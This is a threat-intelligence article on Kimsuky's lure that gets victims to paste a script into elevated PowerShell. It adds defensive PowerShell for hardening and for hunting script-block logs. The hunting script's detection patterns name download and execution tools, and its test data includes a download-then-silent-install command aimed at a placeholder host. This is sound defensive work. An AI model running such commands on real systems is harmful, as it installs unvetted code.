2025-02-16
Emerald Sleet’s Latest Strategy in Cyber Attacks
Microsoft Threat Intelligence researchers have identified a new tactic employed by North Korea-linked cyber espionage group Emerald Sleet (also known as Kimsuky, VELVET CHOLLIMA, and APT43). The hackers are now tricking targets into manually running PowerShell as an administrator, allowing them to execute malicious code.
Kimsuky has been active since at least 2013, operating under North Korea’s Reconnaissance General Bureau (RGB). The group primarily targets think tanks, government agencies, and research organizations in South Korea, the United States, Europe, and Russia. Their latest attack method involves spear-phishing campaigns where they impersonate South Korean government officials to build trust with their targets.
The attack unfolds as follows:
- A phishing email is sent with a bait PDF attachment.
- The victim is lured into clicking a URL, which directs them to register their device.
- The page instructs them to open PowerShell as an administrator and paste a malicious script provided by the hackers.
- This script downloads and installs a browser-based remote desktop tool, allowing attackers to take control of the system.
- A certificate file with a hardcoded PIN is retrieved from a remote server, facilitating device registration.
- Once registered, the hackers can exfiltrate sensitive data and gain persistent access to the system.
Microsoft has observed this tactic in limited attacks since January 2025, but warns that it signals a strategic evolution in Kimsuky’s espionage operations. The company is actively notifying targeted customers and advises organizations to train employees on phishing threats while using attack surface reduction (ASR) rules to mitigate risks.
Separately, researchers at AhnLab Security Intelligence Center (ASEC) recently discovered Kimsuky using forceCopy info-stealer malware via malicious LNK shortcut files disguised as Office documents. These execute PowerShell or Mshta to install PebbleDash malware, RDP Wrapper, and proxy tools for remote access and stealthy data exfiltration.
What Undercode Says:
A Strategic Shift in Cyber Espionage
Kimsuky’s latest PowerShell-based attack represents a dangerous evolution in cyber warfare. Unlike traditional phishing attacks that rely on malware-laden attachments, this technique manipulates human behavior—convincing victims to run malicious commands themselves. This approach:
- Bypasses many traditional security defenses since there’s no automatic execution of malware.
- Leverages user privilege escalation, tricking victims into giving the hackers administrative control.
- Avoids signature-based detection as the attack relies on scripting rather than precompiled executables.
PowerShell as a Double-Edged Sword
PowerShell is an essential tool for IT administrators, but its capabilities make it a prime target for exploitation. The way Emerald Sleet abuses PowerShell mirrors techniques used by other APT groups, such as APT29 (Cozy Bear) and Lazarus Group. Security teams should:
- Restrict PowerShell execution policies to prevent unauthorized scripts.
- Monitor PowerShell logs to detect suspicious activity.
- Implement Just Enough Administration (JEA) to limit what PowerShell commands users can execute.
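To make those three recommendations concrete, here is an added example (not code from the article, from Microsoft, or from ASEC) of a baseline hardening script for a single Windows endpoint: it sets the execution policy, turns on script block, module and transcription logging through the same registry keys the Group Policy settings write, registers a minimal JEA endpoint, and puts two Defender attack surface reduction rules into audit mode. The module name `JeaDemo`, the endpoint name, the transcript directory `C:\PSTranscripts` and the local group `PS-Operators` are assumptions for this example; the ASR rule GUIDs are Microsoft's public rule identifiers and should be checked against the current ASR rules reference before deployment.

```powershell
#Requires -RunAsAdministrator
# Added example: baseline PowerShell hardening for one Windows endpoint.
# Assumes Windows PowerShell 5.1 or later. Names marked (assumed) are
# placeholders chosen for this example, not values from the reports.

# 1. Execution policy. RemoteSigned blocks unsigned scripts downloaded from the
#    internet. It is a guardrail, not a security boundary: a user who pastes
#    commands into an elevated console, as in the campaign above, is not stopped
#    by it, which is why the logging in step 2 matters more.
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine -Force

# 2. Script block, module and transcription logging via the policy registry
#    keys that the corresponding Group Policy settings write.
$base        = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$transcripts = 'C:\PSTranscripts'   # (assumed) restrict its ACL or forward it to a SIEM

New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# Transcription records every interactive session to disk, pasted commands included.
New-Item -Path "$base\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $transcripts
New-Item -Path $transcripts -ItemType Directory -Force | Out-Null

# 3. JEA: a constrained remoting endpoint that exposes a short allow-list of
#    cmdlets and runs as a virtual account, so members of the (assumed) local
#    group PS-Operators can do their routine work without a full elevated shell.
$module = "$env:ProgramFiles\WindowsPowerShell\Modules\JeaDemo"   # (assumed) module name
New-Item -Path "$module\RoleCapabilities" -ItemType Directory -Force | Out-Null
New-Item -Path "$module\JeaDemo.psm1" -ItemType File -Force | Out-Null
New-ModuleManifest -Path "$module\JeaDemo.psd1" -RootModule 'JeaDemo.psm1'

New-PSRoleCapabilityFile -Path "$module\RoleCapabilities\ReadOnlyOps.psrc" -VisibleCmdlets @(
    'Get-Service', 'Get-Process', 'Get-EventLog',
    # Restart-Service is allowed, but only for one named service.
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
)

$pssc = Join-Path $env:TEMP 'JeaDemo.pssc'
New-PSSessionConfigurationFile -Path $pssc -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount -TranscriptDirectory (Join-Path $transcripts 'JEA') `
    -RoleDefinitions @{ "$env:COMPUTERNAME\PS-Operators" = @{ RoleCapabilities = 'ReadOnlyOps' } }
Test-PSSessionConfigurationFile -Path $pssc | Out-Null
# Registering the endpoint restarts the WinRM service.
Register-PSSessionConfiguration -Name 'JeaDemo' -Path $pssc -Force | Out-Null

# 4. Defender attack surface reduction. Start in audit mode, review the audit
#    events (Microsoft-Windows-Windows Defender/Operational, event ID 1122), then
#    switch the action to Enabled. The GUIDs are Microsoft's public ids for
#    "Block executable content from email client and webmail" and "Block
#    execution of potentially obfuscated scripts"; confirm them against the
#    current ASR rules reference.
Add-MpPreference -AttackSurfaceReductionRules_Ids 'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550', '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' `
                 -AttackSurfaceReductionRules_Actions AuditMode, AuditMode
```

Users connect to the constrained endpoint with `Enter-PSSession -ComputerName <host> -ConfigurationName JeaDemo` and see only the four allowed commands. The point of the ordering is that the execution policy alone would not have stopped the "paste this into an elevated PowerShell" step; the transcript and script block logs are what give defenders a record of what was pasted, and JEA removes the need for most staff to hold an elevated shell at all.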
Why This Attack is Highly Effective
This method is psychologically sophisticated. By impersonating a South Korean official, the hackers establish a level of trust with their targets. Many victims may blindly follow instructions, believing they are performing an official task. This is especially dangerous for:
- Government employees handling classified data.
- Researchers and think tanks working on geopolitical issues.
- Corporate executives with access to sensitive intellectual property.
The attack also introduces a stealthy persistence mechanism by registering the victim’s device using a certificate and PIN. This suggests that Emerald Sleet is moving towards more resilient long-term access methods, making detection and remediation more difficult.
The Bigger Picture: North Korea’s Cyber Strategy
North Korea’s hacking groups, including Kimsuky, Lazarus, and APT38, are known for:
- Espionage-focused cyber operations targeting geopolitical intelligence.
- Financial cybercrimes to fund state operations (e.g., cryptocurrency theft).
- Disruptive attacks against political adversaries.
Kimsuky’s primary mission appears to be gathering intelligence on political and military affairs, particularly concerning South Korea and its allies. This aligns with North Korea’s broader efforts to counter Western influence through cyber warfare.
Mitigation Strategies for Organizations
To defend against this evolving threat, organizations must:
- Enhance phishing awareness training—Educate employees about sophisticated social engineering techniques.
- Limit administrative privileges—Ensure that only IT personnel can run PowerShell with elevated privileges.
- Deploy endpoint detection and response (EDR) solutions—Monitor for unusual PowerShell activity.
- Use strong identity verification—Multi-factor authentication (MFA) can prevent unauthorized access.
- Implement network segmentation—Limit lateral movement if an attacker gains access.
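The "monitor for unusual PowerShell activity" item is the one that catches this technique after the user has already complied with the lure, so here is an added example of what that monitoring can look like. It is not code from the article or from the Microsoft or ASEC reports. It hunts the PowerShell operational log (event ID 4104, script block logging) for blocks that show the shape of the chain described above: fetch something from the web, run or install what was fetched, handle a certificate or PIN artefact, and optionally hide or disable protections. The indicator patterns and the scoring are this example's own choices, the sample script blocks at the end are constructed for the demonstration, and the function assumes script block logging is already enabled on the host.

```powershell
# Added example: score 4104 script block events against the download-then-run
# chain described in the article. Pattern lists and weights are this example's
# own assumptions; tune them to your environment.

function Get-SuspiciousScriptBlock {
    param(
        [int]$Hours = 24,        # how far back to read the live log
        [int]$MinScore = 2,      # report a block only when this many groups match
        # Optional: supply script block text directly (SIEM export, transcripts,
        # or the constructed samples below) instead of reading the live log.
        [string[]]$ScriptBlockText
    )

    # Each group scores one point if any of its patterns matches the block.
    $groups = @{
        download = 'Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|Net\.WebClient|Invoke-RestMethod|\birm\b'
        execute  = 'Invoke-Expression|\biex\b|Start-Process|msiexec|Expand-Archive|Unblock-File'
        certpin  = '\.pfx\b|Import-PfxCertificate|\bPIN\b|certutil'
        evasion  = '-enc\b|-EncodedCommand|FromBase64String|-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass|Set-MpPreference'
    }

    $blocks = if ($ScriptBlockText) {
        $ScriptBlockText | ForEach-Object {
            [pscustomobject]@{ Time = (Get-Date); User = 'sample'; Text = $_ }
        }
    } else {
        Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-PowerShell/Operational'
            Id        = 4104
            StartTime = (Get-Date).AddHours(-$Hours)
        } -ErrorAction SilentlyContinue | ForEach-Object {
            # For event 4104, Properties[2] carries the ScriptBlockText field.
            [pscustomobject]@{ Time = $_.TimeCreated; User = $_.UserId; Text = $_.Properties[2].Value }
        }
    }

    foreach ($b in $blocks) {
        $hits = @($groups.GetEnumerator() |
                  Where-Object { $b.Text -match $_.Value } |
                  ForEach-Object { $_.Key })
        if ($hits.Count -ge $MinScore) {
            $flat = $b.Text -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $b.Time
                User    = $b.User
                Score   = $hits.Count
                Matched = ($hits | Sort-Object) -join ','
                Snippet = $flat.Substring(0, [Math]::Min(120, $flat.Length))
            }
        }
    }
}

# Constructed samples for exercising the scoring offline (not real campaign
# commands): an everyday admin one-liner, and a download-then-install shape
# pointed at a reserved .invalid hostname that cannot resolve.
$samples = @(
    'Get-Service | Where-Object Status -eq Running | Sort-Object DisplayName',
    'Invoke-WebRequest -Uri ''https://example.invalid/setup.msi'' -OutFile $env:TEMP\s.msi; Start-Process msiexec -ArgumentList ''/i'', ''$env:TEMP\s.msi'', ''/qn'''
)
Get-SuspiciousScriptBlock -ScriptBlockText $samples | Format-Table -AutoSize -Wrap
```

Called with no parameters on a host where script block logging is on, the function reads the last 24 hours of the live log; with `-ScriptBlockText` it scores whatever text it is given, which is how the two constructed samples are run. The first sample matches no group and is dropped; the second matches the download and execute groups and is reported with a score of 2. Because `Invoke-WebRequest` and `Start-Process` are also ordinary administration commands, treat a hit as a triage lead rather than a verdict: event 4104 does not record whether the console was elevated, so pair the hit with the Security log's process creation event (4688) for the same `powershell.exe`, whose Token Elevation Type field shows whether the user was running as an administrator, the condition the lure in this campaign depends on.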
Conclusion
Kimsuky’s new PowerShell-based attack is an alarming development in cyber espionage.
References:
Reported By: https://securityaffairs.com/174142/apt/emerald-sleet-is-using-a-new-tactic.html